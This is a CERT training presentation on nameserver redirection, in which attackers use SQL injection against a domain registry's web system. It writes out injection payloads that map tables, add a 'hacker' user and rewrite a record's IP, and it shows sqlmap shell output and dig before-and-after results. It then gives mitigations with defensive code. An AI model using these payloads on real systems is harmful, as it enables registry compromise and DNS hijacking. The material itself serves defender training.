DNS Security Attack Scenarios & Demonstrations
1. DNS Security for CERTs
– Attack Scenarios & Demonstrations –
NameServer Redirection
Chris Evans
Delta Risk, LLC
7 March 2010
2. What You Will Need for the Exercise
• Please Watch the Live Demonstration in Front
– We will be targeting the web registry system
• You may need your Ubuntu VM to:
– Prior to the attack, verify that the Web Registry System URL http://www.tld1 points to 192.168.101.50
– After the attack, determine where http://www.tld1 points to
3. Description – NameServer Redirection
• Change of Registration or Delegation Data
– Intentional
• Disgruntled employee changes registry data
• Outsiders pretending to be a customer request an “update” to their account
• Hackers change the registry database directly through web attacks
– Accidental
• Untrained employee
• Typos in registry data
Domain1 NS 1.1.1.1
Domain2 NS 2.2.2.2
Domain3 NS 3.3.3.3 -> 5.5.5.5 (attacker now controls resolutions for Domain3)
4. Case Study
• SQL Injection Tops List of Data Breach Attacks
– SQL Injection used in 60% of all data breach attacks, 19% of all security breaches on the Internet
– Insecure programming techniques combined with proliferation of web-based applications = trouble
– Increase in automated techniques to detect and exploit vulnerabilities = double trouble
Source: DarkReading.com
5. Case Study
• Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection
– Attackers created new user accounts within the system
– These accounts were used to modify existing registrations and re-delegate sites to malicious content
http://www.icann.org/en/security/sa-2009-0001.htm
6. Attack Demonstration
Your website is designed to perform a query during a valid login attempt:
SELECT * FROM table WHERE username='mike' AND password='!QAZ2wsx'
SQL Injection … well … injects SQL statements into your backend database query. A new SQL statement is injected:
SELECT * FROM table WHERE username='mike'; INSERT hacker INTO database
… and the rest of the original SQL statement gets commented out with “--”.
7. Demonstration – Attacker View
One single ' nets: table name and two variables
' group by srs_users.username having 1=1--
Reconnaissance & table mapping...
';insert into srs_users values(101,'hacker','password')--
Adds user hacker to the database…
8. Demonstration – Attacker View (cont.)
Use a SQL injection tool (sqlmap) to gain a shell to the database:
sql-shell> select * from srs_regs where fqdn='rogue.tld1'
do you want to retrieve the SQL statement output? [Y/n] y
[15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where fqdn='rogue.tld1''
[15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on system databases, sqlmap is going to use 'public' schema as database name
[15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] retrieved: 9
[15:15:57] [INFO] retrieved: regid
[15:15:59] [INFO] retrieved: type
[15:16:01] [INFO] retrieved: fqdn
[15:16:03] [INFO] retrieved: ns
[15:16:04] [INFO] retrieved: ip
[15:16:06] [INFO] retrieved: recordtype
[15:16:10] [INFO] retrieved: hostname
[15:16:14] [INFO] retrieved: ownerid
[15:16:17] [INFO] retrieved: parentid
Enumerating the database… then update a record with a bad IP:
'; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --
10. Demonstration – User View
One minute you get the correct IP and website…
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.101.50
;; AUTHORITY SECTION:
…the next you’re browsing whatever the hacker wants you to!
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.85.5
;; AUTHORITY SECTION:
11. Impact
• Registry suffers public relations hit, potential loss of customers & revenue
• Loss of brand reputation, customers, or revenue for registrants who are victimized
• Effect of attack persists even after detection and mitigation because of TTLs
12. Mitigation & Response Strategies
• SQL Injection
– Practice secure coding principles in any web-based application that has database connectivity
– Validate input and prevent “magic characters”
– Use a Web Application Firewall to filter/validate the input to your web application
– Use database logging to track queries and the pages they are being run from
– Frequently audit your web applications (not just the systems they run on!)
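The first two bullets above (secure coding, input validation) come down to one control in practice: the query text must never be assembled from user input. Below is an added example, not code from the presentation or from any registry system, contrasting the slide 6 login query written as the string concatenation that the lone quote on slide 7 breaks with a parameterized version. It uses Python's sqlite3 module in place of the demonstration's PostgreSQL; the (id, username, password) layout of srs_users and the allow-list pattern for usernames are assumptions.

```python
import re
import sqlite3

# Constructed sample data modelled on the srs_users table named on slide 7;
# the (id, username, password) layout is an assumption. Plaintext passwords
# mirror the demonstration; a real registry would store password hashes.
SAMPLE_USERS = [(1, "mike", "!QAZ2wsx"), (2, "alice", "s3cret")]

# Allow-list for account names (assumed policy): letters, digits, '_', '.', '-'.
# This rejects the "magic characters" slide 12 mentions, but it is defence in
# depth; the parameterized query below is the control that stops injection.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def make_db():
    """In-memory stand-in for the registry database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE srs_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO srs_users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_unsafe(conn, username, password):
    """The pattern slide 6 describes: input spliced into the statement text.

    A quote in the input closes the literal early, so whatever follows is
    parsed as SQL, and the parse error that a lone quote produces is what
    reveals the table and column names on slide 7.
    """
    sql = (
        f"SELECT * FROM srs_users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Hardened form: fixed statement text, values bound as parameters.

    The driver passes the values separately from the SQL, so a quote, a
    semicolon or '--' in the input is compared as data and never parsed.
    """
    if not USERNAME_RE.match(username):
        return None
    sql = "SELECT * FROM srs_users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def error_from_unsafe(conn, username):
    """Return the database error text the unsafe query leaks for `username`,
    or None when the input did not break the statement."""
    try:
        login_unsafe(conn, username, "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    print("valid login, parameterized:", login_safe(db, "mike", "!QAZ2wsx"))
    print("lone quote, parameterized:", login_safe(db, "'", "x"))
    print("lone quote, concatenated:", error_from_unsafe(db, "'"))
```

The same fix applies to the registry's own update paths (the srs_regs update on slide 8 went through a concatenated query too): every statement that touches user-controlled data takes it as a bound parameter, and the web tier logs the rejected inputs so the database logging bullet above has something to correlate against.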
13. Mitigation & Response Strategies
• Nameserver Redirection
– Multi-factor authentication of changes
– Out-of-band check of changes (e.g. phone, in-person)
– Domain “locks” which prevent updates unless manually approved
– Validation of changes before publishing new zone files
– Processes for contacting ISPs to “clear” cached entries
– Automated, continuous validation of published data with automated alerting
– Also see ICANN SSAC Report SAC040
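For the “automated, continuous validation of published data” bullet, and the TTL persistence noted on slide 11, here is an added example that is not part of the presentation: a small Python checker that parses the ANSWER SECTION of dig output like that on slide 10, compares it with the records the operator expects to be published, and raises an alert carrying the observed TTL. The expected address for www.tld1 is taken from slide 2; the two transcripts are constructed from the slide 10 output, and keying the baseline by (owner name, record type) is an assumption.

```python
import re
from dataclasses import dataclass

# Baseline the operator expects to see published: from slide 2,
# www.tld1 should resolve to 192.168.101.50. Keyed by (owner name, RR type).
EXPECTED = {("www.tld1.", "A"): {"192.168.101.50"}}

# dig prints answer records as: name  TTL  class  type  rdata
ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(\S+)$")

# Constructed transcripts in the shape of slide 10's dig output.
DIG_BEFORE = """\
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; QUESTION SECTION:
;www.tld1.\t\t\tIN\tA
;; ANSWER SECTION:
www.tld1.\t\t180\tIN\tA\t192.168.101.50
;; AUTHORITY SECTION:
"""
DIG_AFTER = DIG_BEFORE.replace("192.168.101.50", "192.168.85.5")


@dataclass(frozen=True)
class Alert:
    name: str
    rtype: str
    expected: frozenset
    observed: frozenset
    ttl: int  # largest TTL seen on the bad answers: the cache exposure window

    def message(self):
        return (
            f"{self.name} {self.rtype}: expected {sorted(self.expected)}, "
            f"observed {sorted(self.observed) or 'no answer'}; resolvers may "
            f"cache the observed data for up to {self.ttl}s"
        )


def parse_answer_section(dig_output):
    """Return {(name, type): (set of rdata, max ttl)} from a dig transcript.

    Only lines between ';; ANSWER SECTION:' and the next ';;' header are
    records; comment lines and the question section are skipped.
    """
    records = {}
    in_answer = False
    for raw in dig_output.splitlines():
        line = raw.strip()
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if line.startswith(";;"):
            in_answer = False
            continue
        if not in_answer or not line:
            continue
        m = ANSWER_RE.match(line)
        if not m:
            continue  # tolerate wrapped or unexpected lines rather than crash
        name, ttl, rtype, rdata = m.groups()
        rdata_set, max_ttl = records.get((name, rtype), (set(), 0))
        rdata_set.add(rdata)
        records[(name, rtype)] = (rdata_set, max(max_ttl, int(ttl)))
    return records


def check_published_data(dig_output, expected=EXPECTED):
    """Compare one dig transcript against the baseline; return a list of Alerts.

    A missing answer is also an alert: a delegation pointed elsewhere may
    simply stop answering for the name.
    """
    observed = parse_answer_section(dig_output)
    alerts = []
    for (name, rtype), want in expected.items():
        got, ttl = observed.get((name, rtype), (set(), 0))
        if got != want:
            alerts.append(Alert(name, rtype, frozenset(want), frozenset(got), ttl))
    return alerts


if __name__ == "__main__":
    for label, transcript in (("before", DIG_BEFORE), ("after", DIG_AFTER)):
        found = check_published_data(transcript)
        print(label, "->", [a.message() for a in found] or "OK")
```

Run on a schedule against the authoritative servers and a handful of public resolvers, a checker like this turns the slide 10 “one minute … the next” change into an alert within one polling interval. The TTL it reports is also the figure that matters for the “contact ISPs to clear cached entries” step: it is how long a resolver that already holds the bad answer will keep serving it after the registry has fixed the record.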
14. Mitigation & Response Strategies
• Information Sharing – if you’re the victim of an attack, share the details of the attack within the community – you may prevent someone else from becoming a victim
As trusted entities, CERTs can encourage this type of exchange within their communities